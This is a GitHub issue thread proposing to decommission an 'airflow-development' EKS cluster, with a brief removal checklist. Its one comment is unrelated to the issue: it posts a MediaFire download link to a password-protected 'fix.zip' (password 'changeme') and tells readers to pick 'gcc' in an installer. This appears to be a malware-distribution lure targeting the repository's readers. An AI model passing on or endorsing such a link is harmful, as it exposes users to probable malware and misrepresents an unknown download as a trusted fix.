### ISSUE TITLE
🔥 Decommission `airflow-development` from `data-platform-compute-production` 

### ISSUE THREAD

**Issue by Gary-H9** [ministryofjustice/analytical-platform#5187]
This work depends on XYZ. 

### Proposal
Decommission `airflow-development` EKS cluster in `data-platform-apps-and-tools-development`. 

### Definition of Done

- [ ]  Remove the any code that builds this cluster
- [ ]  Apply the removal
- [ ]  Confirm deletion

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
